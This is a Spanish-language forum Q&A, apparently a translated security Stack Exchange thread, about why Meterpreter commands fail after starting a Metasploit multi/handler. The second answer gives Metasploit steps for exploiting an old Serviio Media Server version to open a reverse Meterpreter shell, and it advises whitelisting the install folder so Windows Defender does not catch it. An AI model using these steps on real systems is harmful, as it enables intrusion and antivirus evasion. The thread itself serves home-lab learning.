Los comandos de Meterpreter no funcionan en el shell [cerrado]

0

Usé use multi/handler seguido de set PAYLOAD windows/meterpreter/reverse_tcp luego set LPORT 80 y set LHOST 192.168.0.11 después de eso, hago exploit -j -z y enciendo mi máquina Windows conectada a la misma red y me conecto a 192.168.0.11:80 luego abro mi sesión con sessions -i 1 entonces im en el shell meterpreter. Cuando intento ejecutar ls, ps, cd, download etc ... obtengo Unknown Command: command . ¿Qué estoy haciendo mal? Algunos comandos como help todavía funcionan.

    
pregunta DapperDaniel 01.05.2018 - 01:06
fuente

2 respuestas

1

Simplemente, no puedes hacer eso. Se sentó en el multi / handler con meterpreter reverse_tcp como carga útil y luego se fue a su máquina víctima y lo visitó como un sitio web. Vea, el multi / controlador espera una conexión de una carga útil de meterpreter no desde un navegador web. Por eso no pudiste ejecutar nada.

Para hacer una copia de seguridad de lo que dije, inténtelo otra vez sin las opciones j y z. Cuando vaya a su máquina de Windows y visite su casilla de ataque, verá que la conexión se interrumpe después de que se muestra la cadena de agente de usuario.

No escuches a otros, ni siquiera leyeron tu publicación con cuidado.

    
respondido por el Ahmed chiboub 10.05.2018 - 00:40
fuente
0

¿Cómo se está conectando desde la máquina de Windows de destino a su máquina atacante?

Parece que, dado que está en segundo plano automáticamente la sesión, no está viendo dónde nunca se crea la sesión. Intente simplemente "explotar" sin las banderas y no debería obtener el indicador del medidor como lo está ahora. ¿La sesión muere después de un minuto?

Para hacer que esto funcione, deberás encontrar una vulnerabilidad para explotar, que entregará la carga útil y hará que se vuelva a conectar contigo. Solo debería tener que usar el controlador múltiple para las vulnerabilidades lanzadas fuera de Metasploit, pero no está claro si lo está haciendo o no.

editar: Busqué, encontré y probé una aplicación vulnerable que puedes usar para practicar con Windows 10. No sé cuáles son las reglas para publicar enlaces para software vulnerable, por lo que te diré: Serviio Media Server tiene una vulnerabilidad de ejecución de comandos en algunas de sus versiones anteriores. La información sobre el módulo Metasploit se encuentra aquí . Probé esto con 1.7.1, así que vaya a enlace y copie el enlace de la versión de Windows y cambie la versión actual que están sirviendo ( 1.9.1) a 1.7.1 (literalmente solo cambia el 9 a un 7).

Instale Serviio Media Server en su caja de Windows 10. Recomendaría poner temporalmente en la lista blanca el directorio Drive: \ Program Files \ Serviio \ bin en Windows Defender porque detectará Meterpreter.

Desde su máquina atacante:

msf > use exploit / windows / http / serviio_checkstreamurl_cmd_exec (configure el exploit)

MSF exploit (windows ...) > muestra opciones

Verás que necesitas configurar RHOST (tu máquina Win10) y SRVHOST (tu máquina atacante).

A continuación, configure su carga útil (iremos con el shell de Meterpreter inverso):

MSF exploit (windows ...) > establece windows de carga útil / meterpreter / reverse_tcp

establece tu LHOST en tu máquina atacante.

MSF exploit (windows ...) > exploit

Espero que esto ayude. Buena suerte y por favor usa estas cosas para bien :)

    
respondido por el hoshin 01.05.2018 - 03:52
fuente

Lea otras preguntas en las etiquetas